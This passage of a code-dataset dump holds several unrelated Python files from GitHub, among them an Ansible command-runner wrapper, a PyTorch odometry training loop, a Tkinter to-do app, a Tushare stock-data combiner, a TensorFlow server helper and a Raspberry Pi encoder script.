self.filename = \"/tmp/{0}\".format(uuid.uuid4())\n self.tmp = open(self.filename,'a')\n self.tmp.write(hosts)\n self.tmp.close()\n Options = namedtuple('Options',\n ['connection', 'module_path', 'forks', 'become', 'become_method', 'become_user', 'check',\n 'diff'])\n # initialize needed objects\n self.loader = DataLoader()\n self.options = Options(connection='ssh', module_path=None, forks=100, become=None, become_method=None,\n become_user=None,\n check=False,\n diff=False)\n self.passwords = dict(vault_pass='secret')\n self.inventory = InventoryManager(loader=self.loader, sources=self.filename)\n self.variable_manager = VariableManager(loader=self.loader, inventory=self.inventory)\n self.hosts = hosts\n\n def run_cmd(self, cmd):\n # Instantiate our ResultCallback for handling results as they come in\n results_callback = ResultCallback()\n # create inventory and pass to var manager\n # use path to host config file as source or hosts in a comma separated string\n\n\n # create play with tasks\n play_source = dict(\n name=\"Ansible Play\",\n 
hosts='all',\n gather_facts='no',\n tasks=[\n dict(action=dict(module='shell', args=cmd), register='shell_out')\n ]\n )\n play = Play().load(play_source, variable_manager=self.variable_manager, loader=self.loader)\n\n # actually run it\n tqm = None\n try:\n tqm = TaskQueueManager(\n inventory=self.inventory,\n variable_manager=self.variable_manager,\n loader=self.loader,\n options=self.options,\n passwords=self.passwords,\n stdout_callback=results_callback, # Use our custom callback instead of the ``default`` callback plugin\n )\n result = tqm.run(play)\n return result\n finally:\n if tqm is not None:\n tqm.cleanup()\n os.remove(self.filename)\n # Remove ansible tmpdir\n shutil.rmtree(C.DEFAULT_LOCAL_TMP, True)","repo_name":"hiys/PYTHON","sub_path":"pythonScripts/PyScripts/ansible_api.py","file_name":"ansible_api.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31908068772","text":"from typing import Protocol\r\n\r\nfrom utils.exceptions import CantGetCoordinates\r\nfrom utils.schemas import Coordinates\r\n\r\n\r\ndef _parse_coordinate(*, coordinate_value: str | float | int) -> float:\r\n try:\r\n return float(coordinate_value)\r\n except ValueError:\r\n raise CantGetCoordinates\r\n\r\n\r\nclass CoordinatesSourceProtocol(Protocol):\r\n @classmethod\r\n def get_coordinates(cls) -> Coordinates:\r\n raise NotImplementedError\r\n\r\n\r\nclass PlugSource(CoordinatesSourceProtocol):\r\n latitude = 55.755864\r\n longitude = 37.617698\r\n\r\n @classmethod\r\n def get_coordinates(cls) -> Coordinates:\r\n return Coordinates(longitude=cls.longitude, latitude=cls.latitude)\r\n\r\n\r\nclass ConsoleSource(CoordinatesSourceProtocol):\r\n\r\n @classmethod\r\n def get_coordinates(cls) -> Coordinates:\r\n lat = input(\"Enter your latitude: \")\r\n lon = input(\"Enter your longitude: \")\r\n latitude = _parse_coordinate(coordinate_value=lat)\r\n longitude = _parse_coordinate(coordinate_value=lon)\r\n return Coordinates(longitude=longitude, latitude=latitude)\r\n\r\n\r\ndef get_coordinates(coordinates_source: CoordinatesSourceProtocol) -> Coordinates:\r\n return coordinates_source.get_coordinates()\r\n","repo_name":"quantum73/weather_cli","sub_path":"services/coordinates.py","file_name":"coordinates.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11021932443","text":"import model_chen_2019 as mc19\nimport oxfordDataLoader as odl\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\n# Note: Why do I need to re-import torch?\nis_cuda = torch.cuda.is_available()\nif is_cuda:\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\n\n# The main area\nif __name__==\"__main__\":\n\n # -------------\n # Get the data:\n # batch_size = 16\n batch_size = 256 # from paper\n z = odl.OxfordDataset(window_samples=200, overlap_samples=190)\n loader = DataLoader(z, batch_size=batch_size, pin_memory=True)\n\n # ----------------\n # Setup the model:\n n_epochs = 10\n #lr = 0.01\n lr = 0.00001 # paper has 1e-5\n criterion = nn.MSELoss()\n\n input_size = 6\n hidden_size = 128 # 256\n num_layers = 3 # 2\n output_size = 3 # 4\n\n model = mc19.Chen_IEEE(input_size, hidden_size, num_layers, output_size)\n model.to(device)\n\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n hidden = None\n\n\n # Now train:\n for epoch in range(1, n_epochs+1):\n # Begin your epoch by 
zeroing your gradients in\n # your optimizer (why?)\n optimizer.zero_grad()\n\n for batch_idx, sample in enumerate(loader):\n\n # Concatenate inputs attitude and acceleration\n # from the sensor along the 2nd dimension,\n # which is basically the index for the data group\n\n # Data in should be {acc, omega} both 3-d vectors\n data_in = torch.cat((sample[4], sample[2]), 2).to(device)\n\n # data_in = torch.cat((sample[1], sample[4]), 2).to(device)\n\n # A note on permuting:\n # if you have a matrix, the zeroth 'axis' is the\n # column, and the first is the row. So,\n # permute(1,0) will put the columns into rows,\n # and the rows into columns. It expands to nth axis\n # with tensors.\n # For this particular operation, we are swapping the\n # zeroth and first axes, and those are:\n # og_zeroth = index\n # og_first = physical values (I think)\n data_in.permute(1,0,2)\n trans = sample[7].to(device) # translation from truth\n # I think this should be:\n trans = torch.cat((sample[7], sample[8]), 2).to(device)\n\n\n # Get the diff. TODO: Understand this better!\n #avg_trans_rate =\n\n delta_trans = torch.cat((torch.zeros(trans.shape[0], 1, 3, dtype=torch.float32).to(device), (trans[:,1:,:] - trans[:,:-1,:])), 1)\n output, hidden = model(data_in, hidden)\n print(\"output size = \" + str(output.size()))\n print(\"delta size = \" + str(delta_trans.size()))\n\n # Note, output and delta_trans must have same shape (?)\n loss = criterion(output, delta_trans)\n if batch_idx != len(loader):\n loss.backward(retain_graph=True)\n else:\n loss.backward()\n\n optimizer.step()\n\n # Small number of epochs, so print all:\n print('Epoch: {}/{}..........'.format(epoch, n_epochs), end='')\n print('Loss: {:0.4f}'.format(loss.item()))\n\n\n\n\n","repo_name":"jbelarge/odom-python","sub_path":"models_jab/goModel.py","file_name":"goModel.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11955666344","text":"import spsim.simulation_functions\nfrom spsim.simulation_functions import simulate_single_image\nfrom .test_data_model import test_image_parameters_instantiation, \\\n test_simulation_from_input_parameters\n\n\ndef test_simulate_image():\n image_parameters = test_image_parameters_instantiation()\n image = simulate_single_image(image_parameters)\n assert image.shape == (512, 512)\n\n\ndef test_execute_simulation():\n simulation = test_simulation_from_input_parameters()\n spsim.simulation_functions.simulation_as_dask_array()\n","repo_name":"alisterburt/spsim","sub_path":"tests/test_simulation.py","file_name":"test_simulation.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25982590645","text":"from tkinter import *\n\nwn = Tk()\n\nwn.geometry(\"500x500\")\n\nwn.title(\"To-Do List\")\n\ntitle_lbl = Label(text = \"To-Do List\", font = (\"Georgia\",85,\"bold\"))\ntitle_lbl.pack()\n\nlist_frame = Frame(wn)\nlist_frame.pack(pady = 20)\n\nto_do_list = Listbox(list_frame,\n font = \"Cambria\",\n width = 50,\n height = 5,\n bg = \"SystemButtonFace\",\n bd = 0, \n highlightthickness = 0,\n activestyle = \"none\")\n\nto_do_list.pack()\n\nto_do = [\"Do math homework\", \"Exercise\", \"Read english assignment\"]\n\nfor item in to_do:\n to_do_list.insert(END, item)\n\nitem_entry = Entry(wn, font = (\"Georgia\", 35))\nitem_entry.pack(pady = 20)\n\nbutton_frame = Frame(wn)\nbutton_frame.pack(pady = 20)\n\ndef add_item():\n 
to_do_list.insert(END, item_entry.get())\n item_entry.delete(0, END)\n\ndef delete_item():\n to_do_list.delete(ANCHOR)\n\ndef clear_item():\n to_do_list.delete(0,END)\n\nadd_button = Button(button_frame, text = \"Add Item\", font = (\"Cambria\", 12), width = 12, command = add_item)\ndelete_button = Button(button_frame, text = \"Delete Item\", font = (\"Cambria\", 12), width = 12, command = delete_item)\nclear_button = Button(button_frame, text = \"Clear\", font = (\"Cambria\", 12), width = 12, command = clear_item)\n\nadd_button.grid(row = 0, column = 0)\ndelete_button.grid(row = 0, column = 1, padx = 10)\nclear_button.grid(row = 0, column = 2)\n\nwn.mainloop()\n","repo_name":"zahrazams/It-List","sub_path":"It List.py","file_name":"It List.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20566248667","text":"import requests\r\nfrom bcschain.models import Block\r\nfrom django.utils import timezone\r\nfrom datetime import datetime, timedelta\r\nimport pytz\r\nimport time\r\n\r\n\r\ndef update_blocks():\r\n start_date = datetime.strptime('2021-1-21', \"%Y-%m-%d\")\r\n current_date = datetime.today()\r\n first_block = Block.objects.all().first()\r\n msc = pytz.timezone('Etc/GMT-3')\r\n if first_block:\r\n last_timestamp = first_block.timestamp\r\n else:\r\n last_timestamp = datetime.fromtimestamp(1611187200).\\\r\n replace(tzinfo=msc)\r\n\r\n while (current_date - start_date).days >= 0:\r\n datetime_string = f'{current_date.year}-{current_date.month}-{current_date.day}'\r\n url = f'https://bcschain.info/api/blocks/?date={datetime_string}'\r\n response = requests.get(url)\r\n data = response.json()\r\n\r\n for block in data:\r\n timestamp = datetime.fromtimestamp(int(block['timestamp'])).\\\r\n replace(tzinfo=msc)\r\n if timestamp < last_timestamp:\r\n return\r\n height = block['height']\r\n if timestamp == last_timestamp:\r\n try:\r\n Block.objects.get(height=height)\r\n return\r\n except Block.DoesNotExist:\r\n pass\r\n\r\n obj = Block(height=height,\r\n hash=block['hash'],\r\n timestamp=timestamp,\r\n address=block['miner'],\r\n transactions=block['transactionCount'])\r\n obj.save()\r\n\r\n current_date -= timedelta(days=1)\r\n time.sleep(1)\r\n","repo_name":"lepestos/django_bcs","sub_path":"blockUpdater/blockApi.py","file_name":"blockApi.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9709656291","text":"from __future__ import absolute_import, print_function, division, unicode_literals\nfrom builtins import super, str\n\nimport os\nimport logging\nfrom collections import deque\nimport time\nimport psutil\nimport textwrap\nfrom datetime import datetime\nfrom absl import flags\nfrom contextlib import contextmanager\nfrom typing import List, Deque, Dict, Union, Optional\n\nfrom benchmarks.driver.utils import prompt, remove_prefix\nfrom benchmarks.driver.utils.prompt import pause\nfrom .utils.compatiblity import pathlib, subprocess as sp\nfrom .utils import Popen, execute, ServerError, kill_tree, kill_hard\n\n\nPath = pathlib.Path\nFLAGS = flags.FLAGS\nlogger = logging.getLogger(__name__)\nflags.DEFINE_string('tfserver_endpoint', 'grpc://localhost:2345', 'TF server endpoint to listen on')\n\n\nclass TFDistServer(object):\n\n def __init__(self, env=None, outputdir=None):\n # type: (Dict, Union[Path, str]) -> TFDistServer\n super().__init__()\n\n self.env = os.environ.copy()\n if env 
is not None:\n self.env.update(env)\n if 'CUDA_VISIBLE_DEVICES' not in self.env:\n self.env['CUDA_VISIBLE_DEVICES'] = '0'\n if 'TF_CPP_MIN_LOG_LEVEL' not in self.env:\n self.env['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n self.endpoint = FLAGS.tfserver_endpoint # type: str\n\n self.output = None\n if outputdir is not None:\n self.output = Path(outputdir)\n\n self._build_cmd()\n\n self.proc = None # type: Optional[Popen]\n\n def _build_cmd(self):\n # type: () -> List[str]\n \"\"\"Build commandline using 'config' information\"\"\"\n self.args = []\n\n self.args += [\n 'python',\n ]\n\n return self.args\n\n @contextmanager\n def run(self):\n # type: () -> None\n \"\"\"Run server\"\"\"\n if self.output:\n captured_stdout_path = self.output/'tfdist.stdout'\n captured_stderr_path = self.output/'tfdist.stderr'\n\n captured_stdout_path.parent.mkdir(exist_ok=True)\n captured_stderr_path.parent.mkdir(exist_ok=True)\n\n stdout, stderr = captured_stdout_path.open('w'), captured_stderr_path.open('w')\n else:\n stdout, stderr = None, None\n\n # noinspection PyBroadException\n try:\n pyscript = textwrap.dedent(f\"\"\"\n import tensorflow as tf\n cluster = tf.train.ClusterSpec({{\"tfworker\": [\"{remove_prefix(self.endpoint, \"grpc://\")}\"]}})\n tf.train.Server(cluster, job_name=\"tfworker\", task_index=0,\n config=tf.ConfigProto(isolate_session_state=True)).join()\n \"\"\")\n # start\n self.proc = execute(self.args, env=self.env, stdin=sp.PIPE, stdout=stdout, stderr=stderr)\n self.proc.stdin.write(pyscript + \"\\n\")\n self.proc.stdin.close() # Ensures the process knows nothing else is coming\n\n time.sleep(2)\n\n logger.info(f'Started tf server with pid: {self.proc.pid}')\n\n # make self the current server\n with self.as_current():\n yield\n except Exception as ex:\n logger.error(f'Got exception while running the tf server: {ex!s}')\n finally:\n self.kill()\n\n if self.output:\n stdout.close()\n stderr.close()\n\n _current = deque() # type: Deque[TFDistServer]\n\n @contextmanager\n def as_current(self):\n TFDistServer._current.append(self)\n yield self\n TFDistServer._current.pop()\n\n @classmethod\n def has_current(cls):\n # type: () -> bool\n return len(cls._current) > 0\n\n @classmethod\n def current_server(cls):\n # type: () -> TFDistServer\n try:\n return cls._current[-1]\n except IndexError:\n raise ServerError('No current running tf server')\n\n def check(self):\n # type: () -> None\n \"\"\"Check that the server is healthy and running\"\"\"\n if self.proc is None:\n raise ServerError('TF Server is not yet started')\n if self.proc.poll() is not None:\n out, err = self.proc.communicate()\n msg = [f'TF Server died unexpectedly with return code: {self.proc.returncode}']\n if out is not None:\n msg.append(f'\\nStandard output:\\n{out}')\n if err is not None:\n msg.append(f'\\nStandard error:\\n{err}')\n raise ServerError('\\n'.join(msg))\n\n def kill(self):\n # type: () -> None\n \"\"\"Kill the server\"\"\"\n if FLAGS.no_server:\n return\n\n if self.proc is None or self.proc.poll() is not None:\n logger.warning('TF Server already died or is not yet started')\n self.proc = None\n return\n\n logger.info(f'Killing TF server with pid: {self.proc.pid}')\n _, alive = kill_tree(self.proc, timeout=2)\n if alive:\n prompt.confirm('TF Server did not respond in time, do you want to kill hard?')\n logger.info(f'Force killing server with pid: {self.proc.pid}')\n kill_hard(alive)\n\n self.proc = None\n\n @classmethod\n def wait_workloads(cls, workloads, timeout=None, callback=None):\n \"\"\"Wait workloads, raise if server 
died\"\"\"\n if callback is None:\n def done(proc):\n logger.info(f'Workload {proc.workload.canonical_name} exited with {proc.returncode}')\n\n callback = done\n\n gone = []\n alive = [w.proc for w in workloads]\n enter = datetime.now()\n while alive:\n if TFDistServer.has_current():\n TFDistServer.current_server().check()\n\n g, alive = psutil.wait_procs(alive, timeout=.25, callback=callback)\n gone += g\n\n if timeout is not None and (datetime.now() - enter).total_seconds() >= timeout:\n break\n\n return [p.workload for p in gone], [p.workload for p in alive]\n\n","repo_name":"SymbioticLab/Salus","sub_path":"benchmarks/driver/tfserver.py","file_name":"tfserver.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"67"} +{"seq_id":"27314323632","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nimport load_tushare\n\n# _PATH = '/Users/winston/mygitrep/sys23/' # TODO\n_PATH = './'\n\n\nclass CacheCombiner(object):\n\n def __init__(self, conf: dict):\n self.conf = conf\n self.tds = load_tushare.TushareLoader(conf).get_tradedates(\n start_date='20140630', filename=conf['path']['tradedates'])\n\n def combine_index_weight(self):\n \"\"\"合并股指成分股权重并补全交易日\"\"\"\n\n # Cache path\n cache_path = self.conf['path']['cache']\n # Source path\n basic_path = cache_path + 'index_weight/'\n\n # Iterate distinct stock index\n for kind, code in self.conf['csi_pool'].items():\n\n # Current index code (6-digit)\n code1 = code.split('.')[0]\n\n stack = []\n # Iterate all years\n for year in range(int(self.tds.iloc[0][:4]), int(self.tds.iloc[-1][:4]) + 1):\n src_file = basic_path + f'{code1}_{year}.csv'\n if not os.path.exists(src_file):\n continue\n df = pd.read_csv(src_file)\n df = df.pivot(index='trade_date', columns='con_code', values='weight')\n stack.append(df)\n\n # Concat year-by-year weight for current index\n stack = pd.concat(stack, axis=0)\n # Fill with NA for method `ffill` in the next step\n stack.fillna(0, inplace=True)\n # Reindex columns with the whole tradedates (though disk-space-consuming)\n stack = stack.reindex(self.tds.astype(int), method='ffill')\n\n # If row sum less than 98%, we'll set index weight as NA\n bad_weight_sum = (stack.sum(axis=1) < 98)\n stack.loc[bad_weight_sum] = np.nan\n\n # Save\n stack.to_csv(self.conf['path'][kind])\n print(f\"Updated in `{self.conf['path'][kind]}`\")\n\n def combine_st_status(self):\n df = pd.read_csv(self.conf['path']['cache'] + '/namechange.csv')\n # print(df['change_reason'].value_counts())\n # print(df.groupby('change_reason').first())\n mask_begin = (df['change_reason'] == '*ST') | (df['change_reason'] == 'ST')\n mask_end = (df['change_reason'] == '撤销*ST') | (df['change_reason'] == '撤销ST') | (\n df['change_reason'] == '摘星改名') | (df['change_reason'] == '终止上市')\n df['isST'] = (mask_begin * 2 + mask_end * 1).replace(0, np.nan)\n df = df[['ann_date', 'change_reason', 'ts_code', 'isST']].drop_duplicates().dropna()\n print(df[df[['ann_date', 'ts_code']].duplicated(keep=False)])\n df = df.groupby(['ann_date', 'ts_code'])['isST'].sum().astype(int)\n print(df.value_counts().to_dict())\n df = df.replace(3, 0) # TODO: 3 - 当天有ST又取消ST,则视作之后一直是ST\n df = df.replace(2, 0) # 0 - 从公告日开始,标记为ST/*ST; 1 - 从公告日开始,不再是ST/*ST(或退市)\n print(df.value_counts().to_dict())\n df = df.reset_index()\n df = df.rename(columns={'ann_date': 'tradingdate', 'ts_code': 'stockcode', 'isST': 'st_status'})\n df.to_csv(self.conf['path']['st_status'], index=False)\n 
print(f\"Save {len(df)} rows in `{self.conf['path']['st_status']}`.\")\n\n def infer_tds_todo(self, last_tgt_table: str, is1d=False) -> str:\n \"\"\"根据目标CSV地址,查询末尾日期,确定需要新读取的开始日期;若CSV不存在,选用self.tds开始日期\"\"\"\n if os.path.exists(last_tgt_table):\n if is1d: # a 1d table with columns - `tradingdate`\n # Infer latest combined date from existing combined table\n latest_date = pd.read_csv(last_tgt_table)['tradingdate'].dropna(how='all').iloc[-1]\n # Next date after the latest date\n begin_date = load_tushare.next_calendar_date(latest_date, lfmt='%Y-%m-%d')\n else:\n # Infer latest combined date from existing combined table\n latest_date = pd.read_csv(last_tgt_table, index_col=0).dropna(how='all').index[-1]\n # Next date after the latest date\n begin_date = load_tushare.next_calendar_date(latest_date, lfmt='%Y-%m-%d')\n else:\n # Next date is the beginning of `self.td\n begin_date = pd.to_datetime(self.tds[0]).strftime('%Y-%m-%d')\n return begin_date\n\n def combine_daily(self):\n \"\"\"合并`daily/daily/`中的日度行情指标并进行后复权调整\"\"\"\n cache_path = self.conf['path']['cache']\n daily_path = cache_path + 'daily/' # TODO: download cache - daily\n adj_path = cache_path + 'adj_factor/'\n\n # Next date to update\n begin_date = self.infer_tds_todo(\n last_tgt_table=self.conf['path']['circ_mv']) # TODO\n\n ohlc = ['open', 'high', 'low', 'close']\n volamt = ['vol', 'amount']\n\n tds_todo = self.tds[self.tds >= begin_date]\n if len(tds_todo) > 0:\n cached = {}\n for td in tqdm(tds_todo):\n d = pd.read_csv(f'{daily_path}/{td}.csv', index_col=0).sort_index()\n a = pd.read_csv(f'{adj_path}/{td}.csv', index_col=0)\n try:\n a = a.loc[d.index, 'adj_factor']\n except KeyError as e:\n a = a.loc[a.index.intersection(d.index), 'adj_factor']\n print(f\"{td}: {len(set(d.index) - set(a.index))} index in 'daily' found\" \n f\" but in 'adj_factor' not found:\\n original error message: {e}\\n\")\n\n # TODO: 20230421: 1 index in 'daily' found but in 'adj_factor' not found:\n # original error message: \"['689009.SH'] not in index\"\n # assert not set(d.index) - set(a.index) # 所有日期内所含个股都有对应adjfactor\n\n for c in d.columns:\n if c not in ohlc + volamt:\n continue\n\n sr = d[c]\n sr.name = pd.to_datetime(td, format='%Y%m%d')\n if c not in cached:\n cached[c] = [sr]\n else:\n cached[c].append(sr)\n\n if c in ohlc: # 复权调整\n csr = (d[c] * a).round(9)\n csr.name = pd.to_datetime(td, format='%Y%m%d')\n cc = c + 'Adj'\n if cc not in cached:\n cached[cc] = [csr]\n else:\n cached[cc].append(csr)\n\n for k, v in cached.items(): # 暂时必须延续之前,补充新增交易日\n file = self.conf['path'][k]\n if os.path.exists(file):\n df0 = pd.read_csv(file, index_col=0, parse_dates=True)\n else:\n df0 = pd.DataFrame()\n df1 = pd.concat(v, axis=1).T\n df2 = pd.concat([df0, df1], axis=0)\n df2.to_csv(file)\n print(f\"Updated in `{self.conf['path'][k]}`\")\n print(f\"Updated {len(tds_todo)} rows in `{self.conf['path'][k]}`\")\n\n else:\n print(f\"Skip up-to-time: `{daily_path}`\")\n\n def combine_suspend(self):\n \"\"\"合并停牌信息,最后一天为复牌(R),之前连续的停牌(S),当日又停又复牌(SR or RS),默认NA\"\"\"\n cache_path = self.conf['path']['cache']\n src_path = cache_path + 'suspend_d/' # TODO: download cache path - suspend_d\n tgt_path = self.conf['path']['suspend_d']\n\n begin_date = self.infer_tds_todo(tgt_path, is1d=True)\n\n tds_todo = self.tds[self.tds >= begin_date]\n if len(tds_todo) > 0:\n cached = []\n for td in tqdm(tds_todo):\n s = pd.read_csv(f\"{src_path}{td}.csv\")[['ts_code', 'suspend_type']]\n s = s.groupby('ts_code').sum()\n s = s['suspend_type'].rename(pd.to_datetime(td, 
format='%Y%m%d'))\n cached.append(s)\n\n if os.path.exists(tgt_path):\n df0 = pd.read_csv(tgt_path, index_col=0, parse_dates=True)\n else:\n df0 = pd.DataFrame()\n df1 = pd.concat(cached, axis=1).T\n df1 = df1.stack()\n df1 = df1.reset_index()\n df1.columns = ['tradingdate', 'stockcode', 'suspend_d']\n df2 = pd.concat([df0, df1], axis=0)\n df2.to_csv(tgt_path, index=False)\n print(f\"Updated {len(tds_todo)} rows in `{tgt_path}`\")\n\n else:\n print(f\"Skip up-to-time: `{tgt_path}`\")\n\n def combine_stk_limit(self):\n \"\"\"合并每日的涨跌停价格\"\"\"\n src_path = self.conf['path']['cache'] + 'stk_limit/'\n begin_date = self.infer_tds_todo(self.conf['path']['down_limit'])\n\n tds_todo = self.tds[self.tds >= begin_date]\n if len(tds_todo) > 0:\n cached = {}\n for td in tqdm(self.tds[self.tds >= begin_date]):\n s = pd.read_csv(f\"{src_path}{td}.csv\", index_col=[1])\n td1 = pd.to_datetime(td, format='%Y%m%d')\n\n for c in ['up_limit', 'down_limit']:\n if c in cached:\n cached[c].append(s[c].rename(td1))\n else:\n cached[c] = [s[c].rename(td1)]\n\n for k, v in cached.items():\n tgt_path = self.conf['path'][k]\n df0 = pd.read_csv(tgt_path, index_col=0, parse_dates=True) \\\n if os.path.exists(tgt_path) else pd.DataFrame()\n df1 = pd.concat(cached[k], axis=1).T\n df2 = pd.concat([df0, df1], axis=0)\n df2.to_csv(tgt_path)\n print(f\"Updated {len(tds_todo)} rows in `{tgt_path}`\")\n\n else:\n print(f\"Skip up-to-time: `{src_path}`\")\n\n def infer_up_down_status(self, force_update_all=False):\n \"\"\"直接从日度价格(原始)和日度涨跌停上下界确定涨跌停状态 OU/OD/CU/CD\"\"\"\n\n tgt_path = self.conf['path']['updown_status']\n\n if force_update_all:\n tds_todo = self.tds\n else:\n tds_todo = self.tds[self.tds >= self.infer_tds_todo(tgt_path)]\n\n if len(tds_todo) > 0:\n cached = []\n for td in tqdm(tds_todo):\n df = pd.read_csv(f\"{self.conf['path']['cache']}daily/{td}.csv\", index_col=0)[['open', 'close']]\n po, pc = df['open'], df['close']\n df = pd.read_csv(f\"{self.conf['path']['cache']}stk_limit/{td}.csv\", index_col=1)[['up_limit', 'down_limit']]\n bu, bd = df['up_limit'], df['down_limit']\n del df\n\n open_up = po[po >= bu.reindex_like(po)] # TODO: =?\n open_down = po[po <= bd.reindex_like(po)]\n close_up = pc[pc >= bu.reindex_like(pc)]\n close_down = pc[pc <= bd.reindex_like(pc)]\n\n open_up[:] = 'OU'\n open_down[:] = 'OD'\n close_up[:] = 'CU'\n close_down[:] = 'CD'\n\n sr = pd.concat([\n open_up,\n open_down,\n close_up[close_up.index.difference(open_up.index)],\n close_down[close_down.index.difference(open_down.index)]\n ]).reset_index()\n sr['tradingdate'] = pd.to_datetime(td, format='%Y%m%d')\n sr.columns = ['stockcode', 'updown_status', 'tradingdate']\n sr = sr[['tradingdate', 'stockcode', 'updown_status']]\n sr = sr.sort_values('stockcode')\n\n cached.append(sr)\n\n if (not force_update_all) and (os.path.exists(tgt_path)):\n df0 = pd.read_csv(tgt_path, parse_dates=['tradingdate'])\n else:\n df0 = pd.DataFrame()\n df1 = pd.concat(cached, axis=0)\n df2 = pd.concat([df0, df1], axis=0)\n\n df2.to_csv(tgt_path, index=False)\n print(f\"Updated {len(tds_todo)} rows in `{tgt_path}`\")\n else:\n print(f\"Skip up-to-time: `{tgt_path}`\")\n\n def combine_daily_basic(self):\n \"\"\"合并`./cache/daily_basic/`中每日的基本面指标\"\"\"\n\n # Cache path\n cache_path = self.conf['path']['cache']\n # Source path\n basic_path = cache_path + 'daily_basic/'\n\n # Next date to update\n begin_date = self.infer_tds_todo(\n last_tgt_table=self.conf['path']['circ_mv'])\n\n tds_todo = self.tds[self.tds >= begin_date]\n if len(tds_todo) > 0:\n\n # Container for 
new daily data loaded\n cached = {}\n # Iterate for all new dates\n for td in tqdm(tds_todo):\n # Load one-day basic data\n d = pd.read_csv(f'{basic_path}/{td}.csv', index_col=0).loc[:, 'turnover_rate':]\n # Reorder by stock-code\n d.sort_index(inplace=True)\n\n # Cache one-day indices\n for cc in d.columns:\n sr = d[cc]\n sr.name = pd.to_datetime(td, format='%Y%m%d')\n if cc not in cached:\n cached[cc] = [sr]\n else:\n cached[cc].append(sr)\n\n # Concat and save\n for k, v in cached.items():\n file = self.conf['path'][k]\n\n if os.path.exists(file):\n df0 = pd.read_csv(file, index_col=0, parse_dates=True)\n else:\n df0 = pd.DataFrame()\n df1 = pd.concat(v, axis=1).T\n df2 = pd.concat([df0, df1], axis=0)\n df2.to_csv(file)\n\n print(f\"Updated {len(tds_todo)} rows in `{self.conf['path'][k]}`\")\n else:\n print(f\"Skip up-to-time: `{basic_path}`\")\n\n def generate_demo(self, length=30):\n \"\"\"将所有已有表格都生成demo作为示例数据\"\"\"\n for k, file in tqdm(self.conf['path'].items()):\n if file[-4:] != '.csv':\n continue\n pd.read_csv(file, index_col=0).tail(length).to_csv(\n self.conf['path']['cache_demo'] + file.rsplit('/', maxsplit=1)[-1])\n\n\ndef main():\n config_path = f'{_PATH}/config_stk.yaml'\n conf = load_tushare.conf_init(conf_path=config_path)\n if conf['status'] == 1:\n combiner = CacheCombiner(conf)\n combiner.combine_suspend()\n combiner.combine_st_status()\n combiner.combine_daily()\n combiner.combine_stk_limit()\n combiner.infer_up_down_status(force_update_all=False)\n combiner.combine_daily_basic()\n combiner.combine_index_weight()\n if conf['update_cache_demo'] == 1:\n combiner.generate_demo(length=10)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wins-m/sys23","sub_path":"api/combine_tushare.py","file_name":"combine_tushare.py","file_ext":"py","file_size_in_byte":14943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"69809925334","text":"from RPi import GPIO\r\nfrom time import sleep\r\nimport requests\r\n\r\ndef getserial():\r\n # Extract serial from cpuinfo file\r\n cpuserial = \"0000000000000000\"\r\n try:\r\n f = open('/proc/cpuinfo','r')\r\n for line in f:\r\n if line[0:6]=='Serial':\r\n cpuserial = line[10:26]\r\n f.close()\r\n except:\r\n cpuserial = \"ERROR000000000\"\r\n return cpuserial\r\n\r\nurl = \"http://127.0.0.1:5000/\"\r\nmac = getserial()\r\n\r\ndef sendData(metros):\r\n response = requests.post(url, mac, metros) # mac, metros\r\n if response.ok:\r\n print(\"Upload completed successfully!\")\r\n print(response.text)\r\n else:\r\n print(\"Something went wrong!\")\r\n print(response.text)\r\n\r\n# GPIO pins\r\nclk = 17\r\ndt = 18\r\n\r\n# GPIO setup\r\nGPIO.setmode(GPIO.BCM)\r\nGPIO.setup(clk, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\r\nGPIO.setup(dt, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\r\n\r\ncounter = 0\r\nclkLastState = GPIO.input(clk)\r\n\r\ntry:\r\n while True:\r\n clkState = GPIO.input(clk)\r\n dtState = GPIO.input(dt)\r\n if clkState != clkLastState:\r\n if dtState != clkState:\r\n counter += 1\r\n counter2 = 0\r\n clkLastState = clkState\r\n sleep(0.0001)\r\n # if more than 5sec pass without a rotation, send data\r\n if counter2 > 500:\r\n metros = counter/1200 # 1200 pulses per meter\r\n sendData(metros)\r\n counter = 0 # reset rotation counter\r\n counter2 = 0\r\n else:\r\n counter2 += 1\r\nfinally:\r\n GPIO.cleanup() 
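\r\n\r\n# Reviewer note: requests.post(url, mac, metros) in sendData above binds mac to the\r\n# positional data= parameter (the raw request body) and metros to json=, which is\r\n# almost certainly not the intended \"MAC plus meters\" payload. A hedged sketch of a\r\n# fix — the field names are assumptions about the Flask server, not confirmed by it:\r\n#\r\n#     def sendData(metros):\r\n#         response = requests.post(url, data={\"mac\": mac, \"metros\": metros})\r\n#         ...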
